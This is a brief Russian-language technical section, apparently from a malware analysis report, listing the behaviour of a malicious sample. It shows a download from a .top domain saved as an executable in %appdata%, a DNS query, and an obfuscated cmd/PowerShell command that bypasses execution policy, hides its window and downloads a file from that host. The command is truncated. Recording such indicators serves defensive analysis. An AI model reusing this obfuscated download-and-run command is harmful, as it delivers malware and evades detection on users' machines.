Техническая информация
- http://truthforeyoue.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POWerShEl^l^.e^xE -^ExE^C^u^tioNpoLI^CY^ bypa^ss -n^opRofil^E^ ^-WIN^Do^wSTyle ^H^iD^d^E^n^ ^(N^ew-^ob^J^EC^T ^sY^S^te^m.^N^eT.^Web^c^LI^e^NT).DoWnLOAdFilE(^'http://truthforeyo...
- DNS ASK tr####oreyoue.top
- '<SYSTEM32>\cmd.exe' /C "POWerShEl^l^.e^xE -^ExE^C^u^tioNpoLI^CY^ bypa^ss -n^opRofil^E^ ^-WIN^Do^wSTyle ^H^iD^d^E^n^ ^(N^ew-^ob^J^EC^T ^sY^S^te^m.^N^eT.^Web^c^LI^e^NT).DoWnLOAdFilE(^'http://truthforeyo...' (со скрытым окном)